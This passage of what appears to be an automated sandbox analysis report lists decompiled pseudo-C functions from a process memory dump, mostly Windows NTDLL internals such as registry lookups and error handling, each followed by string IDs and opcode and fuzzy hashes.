                                                                            					_push( &_v44);
                                                                            					_v28 = 0x18;
                                                                            					_push( &_v28);
                                                                            					_push(0x100020);
                                                                            					_v24 = 0;
                                                                            					_push( &_v60);
                                                                            					_v16 = 0x40;
                                                                            					_v12 = 0;
                                                                            					_v8 = 0;
                                                                            					_t58 = E010B9830();
                                                                            					_t87 =  *[fs:0x30];
                                                                            					_t108 = _t58;
                                                                            					L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                                            					if(_t108 < 0) {
                                                                            						L11:
                                                                            						_t51 = _t108;
                                                                            					} else {
                                                                            						_push(4);
                                                                            						_push(8);
                                                                            						_push( &_v36);
                                                                            						_push( &_v44);
                                                                            						_push(_v60);
                                                                            						_t108 = E010B9990();
                                                                            						if(_t108 < 0) {
                                                                            							L10:
                                                                            							_push(_v60);
                                                                            							E010B95D0();
                                                                            							goto L11;
                                                                            						} else {
                                                                            							_t109 = L01094620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                                            							if(_t109 == 0) {
                                                                            								_t108 = 0xc0000017;
                                                                            								goto L10;
                                                                            							} else {
                                                                            								_t21 = _t109 + 0x18; // 0x18
                                                                            								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                                            								 *_t109 = 1;
                                                                            								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                                            								 *(_t109 + 0xe) = _t82;
                                                                            								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                                            								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                                            								E010BF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                                            								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                            								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                                            								_t91 =  *_t103 & 0x0000ffff;
                                                                            								_t100 = _t91 & 0xfffffffe;
                                                                            								_t84 = 0x5c;
                                                                            								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                                            									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                                            										_push(_v60);
                                                                            										E010B95D0();
                                                                            										L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                                            										_t51 = 0xc0000106;
                                                                            									} else {
                                                                            										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                                            										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                            										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                                            										goto L5;
                                                                            									}
                                                                            								} else {
                                                                            									L5:
                                                                            									 *_a4 = _t109;
                                                                            									_t51 = 0;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				return _t51;
                                                                            			}


























                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                            • Instruction ID: 22f8575f0d85b9f68c3ee6d972eff377027d81a325ad45778eeb3dfd17de4e87
                                                                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                            • Instruction Fuzzy Hash: 79518D71504711AFC321DF69C840AABBBF8FF48714F00892EFA9597690E7B4E914CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 75%
                                                                            			E010F3540(intOrPtr _a4) {
                                                                            				signed int _v12;
                                                                            				intOrPtr _v88;
                                                                            				intOrPtr _v92;
                                                                            				char _v96;
                                                                            				char _v352;
                                                                            				char _v1072;
                                                                            				intOrPtr _v1140;
                                                                            				intOrPtr _v1148;
                                                                            				char _v1152;
                                                                            				char _v1156;
                                                                            				char _v1160;
                                                                            				char _v1164;
                                                                            				char _v1168;
                                                                            				char* _v1172;
                                                                            				short _v1174;
                                                                            				char _v1176;
                                                                            				char _v1180;
                                                                            				char _v1192;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				short _t41;
                                                                            				short _t42;
                                                                            				intOrPtr _t80;
                                                                            				intOrPtr _t81;
                                                                            				signed int _t82;
                                                                            				void* _t83;
                                                                            
                                                                            				_v12 =  *0x116d360 ^ _t82;
                                                                            				_t41 = 0x14;
                                                                            				_v1176 = _t41;
                                                                            				_t42 = 0x16;
                                                                            				_v1174 = _t42;
                                                                            				_v1164 = 0x100;
                                                                            				_v1172 = L"BinaryHash";
                                                                            				_t81 = E010B0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                                            				if(_t81 < 0) {
                                                                            					L11:
                                                                            					_t75 = _t81;
                                                                            					E010F3706(0, _t81, _t79, _t80);
                                                                            					L12:
                                                                            					if(_a4 != 0xc000047f) {
                                                                            						E010BFA60( &_v1152, 0, 0x50);
                                                                            						_v1152 = 0x60c201e;
                                                                            						_v1148 = 1;
                                                                            						_v1140 = E010F3540;
                                                                            						E010BFA60( &_v1072, 0, 0x2cc);
                                                                            						_push( &_v1072);
                                                                            						E010CDDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                                            						E01100C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                                            						_push(_v1152);
                                                                            						_push(0xffffffff);
                                                                            						E010B97C0();
                                                                            					}
                                                                            					return E010BB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                                            				}
                                                                            				_t79 =  &_v352;
                                                                            				_t81 = E010F3971(0, _a4,  &_v352,  &_v1156);
                                                                            				if(_t81 < 0) {
                                                                            					goto L11;
                                                                            				}
                                                                            				_t75 = _v1156;
                                                                            				_t79 =  &_v1160;
                                                                            				_t81 = E010F3884(_v1156,  &_v1160,  &_v1168);
                                                                            				if(_t81 >= 0) {
                                                                            					_t80 = _v1160;
                                                                            					E010BFA60( &_v96, 0, 0x50);
                                                                            					_t83 = _t83 + 0xc;
                                                                            					_push( &_v1180);
                                                                            					_push(0x50);
                                                                            					_push( &_v96);
                                                                            					_push(2);
                                                                            					_push( &_v1176);
                                                                            					_push(_v1156);
                                                                            					_t81 = E010B9650();
                                                                            					if(_t81 >= 0) {
                                                                            						if(_v92 != 3 || _v88 == 0) {
                                                                            							_t81 = 0xc000090b;
                                                                            						}
                                                                            						if(_t81 >= 0) {
                                                                            							_t75 = _a4;
                                                                            							_t79 =  &_v352;
                                                                            							E010F3787(_a4,  &_v352, _t80);
                                                                            						}
                                                                            					}
                                                                            					L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                                            				}
                                                                            				_push(_v1156);
                                                                            				E010B95D0();
                                                                            				if(_t81 >= 0) {
                                                                            					goto L12;
                                                                            				} else {
                                                                            					goto L11;
                                                                            				}
                                                                            			}
































                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: BinaryHash
                                                                            • API String ID: 0-2202222882
                                                                            • Opcode ID: 8380f9592dac5e1513d06b6e228cd789b994964809c3a2e5d67a4630ecf28d5b
                                                                            • Instruction ID: 327fc2ac966da62586be38932216f173ba5389f23a8383accb83d7a273245aa2
                                                                            • Opcode Fuzzy Hash: 8380f9592dac5e1513d06b6e228cd789b994964809c3a2e5d67a4630ecf28d5b
                                                                            • Instruction Fuzzy Hash: 3C4125F1D0052DABDB21DA54CC85FDEB77CAB54724F0085A9EB49AB240DB319E88CF94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 71%
                                                                            			E011405AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                            				signed int _v20;
                                                                            				char _v24;
                                                                            				signed int _v28;
                                                                            				char _v32;
                                                                            				signed int _v36;
                                                                            				intOrPtr _v40;
                                                                            				void* __ebx;
                                                                            				void* _t35;
                                                                            				signed int _t42;
                                                                            				char* _t48;
                                                                            				signed int _t59;
                                                                            				signed char _t61;
                                                                            				signed int* _t79;
                                                                            				void* _t88;
                                                                            
                                                                            				_v28 = __edx;
                                                                            				_t79 = __ecx;
                                                                            				if(E011407DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                                            					L13:
                                                                            					_t35 = 0;
                                                                            					L14:
                                                                            					return _t35;
                                                                            				}
                                                                            				_t61 = __ecx[1];
                                                                            				_t59 = __ecx[0xf];
                                                                            				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                                            				_v36 = _a8 << 0xc;
                                                                            				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                                            				asm("sbb esi, esi");
                                                                            				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                                            				if(_t42 != 0) {
                                                                            					_push(0);
                                                                            					_push(0x14);
                                                                            					_push( &_v24);
                                                                            					_push(3);
                                                                            					_push(_t59);
                                                                            					_push(0xffffffff);
                                                                            					if(E010B9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                                            						_push(_t61);
                                                                            						E0113A80D(_t59, 1, _v20, 0);
                                                                            						_t88 = 4;
                                                                            					}
                                                                            				}
                                                                            				_t35 = E0113A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                                            				if(_t35 < 0) {
                                                                            					goto L14;
                                                                            				}
                                                                            				E01141293(_t79, _v40, E011407DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                                            				if(E01097D50() == 0) {
                                                                            					_t48 = 0x7ffe0380;
                                                                            				} else {
                                                                            					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                            				}
                                                                            				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                            					E0113138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                                            				}
                                                                            				goto L13;
                                                                            			}


















                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `
                                                                            • API String ID: 0-2679148245
                                                                            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                            • Instruction ID: ccb43a3e158ae07fe416d6fe8a8388b057edb74b69a5f12e91c45aab420f5fcf
                                                                            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                            • Instruction Fuzzy Hash: A931D0322043066BE714DE2ACD84FD67B99AFC8B58F144229BB959B280D770E905CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 72%
                                                                            			E010F3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                            				char _v8;
                                                                            				intOrPtr _v12;
                                                                            				intOrPtr* _v16;
                                                                            				char* _v20;
                                                                            				short _v22;
                                                                            				char _v24;
                                                                            				intOrPtr _t38;
                                                                            				short _t40;
                                                                            				short _t41;
                                                                            				void* _t44;
                                                                            				intOrPtr _t47;
                                                                            				void* _t48;
                                                                            
                                                                            				_v16 = __edx;
                                                                            				_t40 = 0x14;
                                                                            				_v24 = _t40;
                                                                            				_t41 = 0x16;
                                                                            				_v22 = _t41;
                                                                            				_t38 = 0;
                                                                            				_v12 = __ecx;
                                                                            				_push( &_v8);
                                                                            				_push(0);
                                                                            				_push(0);
                                                                            				_push(2);
                                                                            				_t43 =  &_v24;
                                                                            				_v20 = L"BinaryName";
                                                                            				_push( &_v24);
                                                                            				_push(__ecx);
                                                                            				_t47 = 0;
                                                                            				_t48 = E010B9650();
                                                                            				if(_t48 >= 0) {
                                                                            					_t48 = 0xc000090b;
                                                                            				}
                                                                            				if(_t48 != 0xc0000023) {
                                                                            					_t44 = 0;
                                                                            					L13:
                                                                            					if(_t48 < 0) {
                                                                            						L16:
                                                                            						if(_t47 != 0) {
                                                                            							L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                                            						}
                                                                            						L18:
                                                                            						return _t48;
                                                                            					}
                                                                            					 *_v16 = _t38;
                                                                            					 *_a4 = _t47;
                                                                            					goto L18;
                                                                            				}
                                                                            				_t47 = L01094620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                            				if(_t47 != 0) {
                                                                            					_push( &_v8);
                                                                            					_push(_v8);
                                                                            					_push(_t47);
                                                                            					_push(2);
                                                                            					_push( &_v24);
                                                                            					_push(_v12);
                                                                            					_t48 = E010B9650();
                                                                            					if(_t48 < 0) {
                                                                            						_t44 = 0;
                                                                            						goto L16;
                                                                            					}
                                                                            					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                                            						_t48 = 0xc000090b;
                                                                            					}
                                                                            					_t44 = 0;
                                                                            					if(_t48 < 0) {
                                                                            						goto L16;
                                                                            					} else {
                                                                            						_t17 = _t47 + 0xc; // 0xc
                                                                            						_t38 = _t17;
                                                                            						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                                            							_t48 = 0xc000090b;
                                                                            						}
                                                                            						goto L13;
                                                                            					}
                                                                            				}
                                                                            				_t48 = _t48 + 0xfffffff4;
                                                                            				goto L18;
                                                                            			}
















                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: BinaryName
                                                                            • API String ID: 0-215506332
                                                                            • Opcode ID: f17198b38435df40738311323a6a42bc911c0c86a0cf28bb4cb2f0b7cf63ac45
                                                                            • Instruction ID: eb7eebf47203b544bd0a3afc32e8a686e9f0f88a03046f485347ac09e8058607
                                                                            • Opcode Fuzzy Hash: f17198b38435df40738311323a6a42bc911c0c86a0cf28bb4cb2f0b7cf63ac45
                                                                            • Instruction Fuzzy Hash: EB310872D0450AAFDB15DA58C946DAFB7B4FB40730F01416DEA94AB640D7319E00CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 33%
                                                                            			E010AD294(void* __ecx, char __edx, void* __eflags) {
                                                                            				signed int _v8;
                                                                            				char _v52;
                                                                            				signed int _v56;
                                                                            				signed int _v60;
                                                                            				intOrPtr _v64;
                                                                            				char* _v68;
                                                                            				intOrPtr _v72;
                                                                            				char _v76;
                                                                            				signed int _v84;
                                                                            				intOrPtr _v88;
                                                                            				char _v92;
                                                                            				intOrPtr _v96;
                                                                            				intOrPtr _v100;
                                                                            				char _v104;
                                                                            				char _v105;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				signed int _t35;
                                                                            				char _t38;
                                                                            				signed int _t40;
                                                                            				signed int _t44;
                                                                            				signed int _t52;
                                                                            				void* _t53;
                                                                            				void* _t55;
                                                                            				void* _t61;
                                                                            				intOrPtr _t62;
                                                                            				void* _t64;
                                                                            				signed int _t65;
                                                                            				signed int _t66;
                                                                            
                                                                            				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                                            				_v8 =  *0x116d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                                            				_v105 = __edx;
                                                                            				_push( &_v92);
                                                                            				_t52 = 0;
                                                                            				_push(0);
                                                                            				_push(0);
                                                                            				_push( &_v104);
                                                                            				_push(0);
                                                                            				_t59 = __ecx;
                                                                            				_t55 = 2;
                                                                            				if(E01094120(_t55, __ecx) < 0) {
                                                                            					_t35 = 0;
                                                                            					L8:
                                                                            					_pop(_t61);
                                                                            					_pop(_t64);
                                                                            					_pop(_t53);
                                                                            					return E010BB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                                            				}
                                                                            				_v96 = _v100;
                                                                            				_t38 = _v92;
                                                                            				if(_t38 != 0) {
                                                                            					_v104 = _t38;
                                                                            					_v100 = _v88;
                                                                            					_t40 = _v84;
                                                                            				} else {
                                                                            					_t40 = 0;
                                                                            				}
                                                                            				_v72 = _t40;
                                                                            				_v68 =  &_v104;
                                                                            				_push( &_v52);
                                                                            				_v76 = 0x18;
                                                                            				_push( &_v76);
                                                                            				_v64 = 0x40;
                                                                            				_v60 = _t52;
                                                                            				_v56 = _t52;
                                                                            				_t44 = E010B98D0();
                                                                            				_t62 = _v88;
                                                                            				_t65 = _t44;
                                                                            				if(_t62 != 0) {
                                                                            					asm("lock xadd [edi], eax");
                                                                            					if((_t44 | 0xffffffff) != 0) {
                                                                            						goto L4;
                                                                            					}
                                                                            					_push( *((intOrPtr*)(_t62 + 4)));
                                                                            					E010B95D0();
                                                                            					L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                                            					goto L4;
                                                                            				} else {
                                                                            					L4:
                                                                            					L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                                            					if(_t65 >= 0) {
                                                                            						_t52 = 1;
                                                                            					} else {
                                                                            						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                                            							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                                            						}
                                                                            					}
                                                                            					_t35 = _t52;
                                                                            					goto L8;
                                                                            				}
                                                                            			}

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: 0277cd6ffe2849e96730800768b41ba5b874604a33886ca4d3eb7db8b64f4f81
                                                                            • Instruction ID: ea7862e16d90dafa8f0e4a214992ab796ae17cc7a87055125e872eb6899cc3a8
                                                                            • Opcode Fuzzy Hash: 0277cd6ffe2849e96730800768b41ba5b874604a33886ca4d3eb7db8b64f4f81
                                                                            • Instruction Fuzzy Hash: 7D31DFB2608305AFC721DFA8C8809AFBBE8FB99654F40492EF9D483610D634DD04CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 72%
                                                                            			E01081B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                                            				intOrPtr _v8;
                                                                            				char _v16;
                                                                            				intOrPtr* _t26;
                                                                            				intOrPtr _t29;
                                                                            				void* _t30;
                                                                            				signed int _t31;
                                                                            
                                                                            				_t27 = __ecx;
                                                                            				_t29 = __edx;
                                                                            				_t31 = 0;
                                                                            				_v8 = __edx;
                                                                            				if(__edx == 0) {
                                                                            					L18:
                                                                            					_t30 = 0xc000000d;
                                                                            					goto L12;
                                                                            				} else {
                                                                            					_t26 = _a4;
                                                                            					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                                            						goto L18;
                                                                            					} else {
                                                                            						E010BBB40(__ecx,  &_v16, __ecx);
                                                                            						_push(_t26);
                                                                            						_push(0);
                                                                            						_push(0);
                                                                            						_push(_t29);
                                                                            						_push( &_v16);
                                                                            						_t30 = E010BA9B0();
                                                                            						if(_t30 >= 0) {
                                                                            							_t19 =  *_t26;
                                                                            							if( *_t26 != 0) {
                                                                            								goto L7;
                                                                            							} else {
                                                                            								 *_a8 =  *_a8 & 0;
                                                                            							}
                                                                            						} else {
                                                                            							if(_t30 != 0xc0000023) {
                                                                            								L9:
                                                                            								_push(_t26);
                                                                            								_push( *_t26);
                                                                            								_push(_t31);
                                                                            								_push(_v8);
                                                                            								_push( &_v16);
                                                                            								_t30 = E010BA9B0();
                                                                            								if(_t30 < 0) {
                                                                            									L12:
                                                                            									if(_t31 != 0) {
                                                                            										L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                                            									}
                                                                            								} else {
                                                                            									 *_a8 = _t31;
                                                                            								}
                                                                            							} else {
                                                                            								_t19 =  *_t26;
                                                                            								if( *_t26 == 0) {
                                                                            									_t31 = 0;
                                                                            								} else {
                                                                            									L7:
                                                                            									_t31 = L01094620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                                            								}
                                                                            								if(_t31 == 0) {
                                                                            									_t30 = 0xc0000017;
                                                                            								} else {
                                                                            									goto L9;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				return _t30;
                                                                            			}

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: WindowsExcludedProcs
                                                                            • API String ID: 0-3583428290
                                                                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                            • Instruction ID: 5611fb23f07ef89243970b3e91128e115c48aa5e5484e568cb80fdcb2df18035
                                                                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                            • Instruction Fuzzy Hash: E221F57A60472DEFDB22AA598880F9FBBADAF44651F058465FED4DB200D630DC0297A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0109F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                            				intOrPtr _t13;
                                                                            				intOrPtr _t14;
                                                                            				signed int _t16;
                                                                            				signed char _t17;
                                                                            				intOrPtr _t19;
                                                                            				intOrPtr _t21;
                                                                            				intOrPtr _t23;
                                                                            				intOrPtr* _t25;
                                                                            
                                                                            				_t25 = _a8;
                                                                            				_t17 = __ecx;
                                                                            				if(_t25 == 0) {
                                                                            					_t19 = 0xc00000f2;
                                                                            					L8:
                                                                            					return _t19;
                                                                            				}
                                                                            				if((__ecx & 0xfffffffe) != 0) {
                                                                            					_t19 = 0xc00000ef;
                                                                            					goto L8;
                                                                            				}
                                                                            				_t19 = 0;
                                                                            				 *_t25 = 0;
                                                                            				_t21 = 0;
                                                                            				_t23 = "Actx ";
                                                                            				if(__edx != 0) {
                                                                            					if(__edx == 0xfffffffc) {
                                                                            						L21:
                                                                            						_t21 = 0x200;
                                                                            						L5:
                                                                            						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                                                            						 *_t25 = _t13;
                                                                            						L6:
                                                                            						if(_t13 == 0) {
                                                                            							if((_t17 & 0x00000001) != 0) {
                                                                            								 *_t25 = _t23;
                                                                            							}
                                                                            						}
                                                                            						L7:
                                                                            						goto L8;
                                                                            					}
                                                                            					if(__edx == 0xfffffffd) {
                                                                            						 *_t25 = _t23;
                                                                            						_t13 = _t23;
                                                                            						goto L6;
                                                                            					}
                                                                            					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                                                            					 *_t25 = _t13;
                                                                            					L14:
                                                                            					if(_t21 == 0) {
                                                                            						goto L6;
                                                                            					}
                                                                            					goto L5;
                                                                            				}
                                                                            				_t14 = _a4;
                                                                            				if(_t14 != 0) {
                                                                            					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                                                            					if(_t16 <= 1) {
                                                                            						_t21 = 0x1f8;
                                                                            						_t13 = 0;
                                                                            						goto L14;
                                                                            					}
                                                                            					if(_t16 == 2) {
                                                                            						goto L21;
                                                                            					}
                                                                            					if(_t16 != 4) {
                                                                            						_t19 = 0xc00000f0;
                                                                            						goto L7;
                                                                            					}
                                                                            					_t13 = 0;
                                                                            					goto L6;
                                                                            				} else {
                                                                            					_t21 = 0x1f8;
                                                                            					goto L5;
                                                                            				}
                                                                            			}












                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Actx
                                                                            • API String ID: 0-89312691
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 71%
                                                                            			E01128DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                            				intOrPtr _t35;
                                                                            				void* _t41;
                                                                            
                                                                            				_t40 = __esi;
                                                                            				_t39 = __edi;
                                                                            				_t38 = __edx;
                                                                            				_t35 = __ecx;
                                                                            				_t34 = __ebx;
                                                                            				_push(0x74);
                                                                            				_push(0x1150d50);
                                                                            				E010CD0E8(__ebx, __edi, __esi);
                                                                            				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                                            				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                                            					E01105720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                                            					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                                            						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                            						asm("int3");
                                                                            						 *(_t41 - 4) = 0xfffffffe;
                                                                            					}
                                                                            				}
                                                                            				 *(_t41 - 4) = 1;
                                                                            				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                                            				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                                            				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                                            				 *((intOrPtr*)(_t41 - 0x64)) = L010CDEF0;
                                                                            				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                                            				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                                            				_push(_t41 - 0x70);
                                                                            				L010CDEF0(1, _t38);
                                                                            				 *(_t41 - 4) = 0xfffffffe;
                                                                            				return E010CD130(_t34, _t39, _t40);
                                                                            			}






                                                                            Strings
                                                                            • Critical error detected %lx, xrefs: 01128E21
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Critical error detected %lx
                                                                            • API String ID: 0-802127002
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0110FF60
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                            • API String ID: 0-1911121157
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            • Opcode Fuzzy Hash: 2cd93392520b15377738f590c75a7182ddf849b81312c24f92f4c1e1e137c86d
                                                                            • Instruction Fuzzy Hash: 2B71247AA04B02EFE73ADF18C840F96BBE5EF44724F154528E655872E0EBB1E940CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                            • Instruction ID: 78022add4f2934c0e6b5c550a5308243868ec25c57562ebf9da239abd9e75c92
                                                                            • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                            • Instruction Fuzzy Hash: DA717C71A0060AEFDB11DFA8C984AEEBBF9FF48714F144069E645E7650DB30AA41CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c9c4052685e7ab159e5ce2bbc1ac2a845fb0361976ab46d8a5bdb884fda527eb
                                                                            • Instruction ID: 32c05d91196f3c39c073e0e0ded33037d9f09deec91ada9e526d5901c51154dd
                                                                            • Opcode Fuzzy Hash: c9c4052685e7ab159e5ce2bbc1ac2a845fb0361976ab46d8a5bdb884fda527eb
                                                                            • Instruction Fuzzy Hash: E151C971204342ABD721AF28C841BABBBE4FF91714F10096EF5D983691E771E840CBA6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 99c2c6924d9e24eb8e09d9a9f99c4e8ea4206885112ff876574ee554d5cd03dc
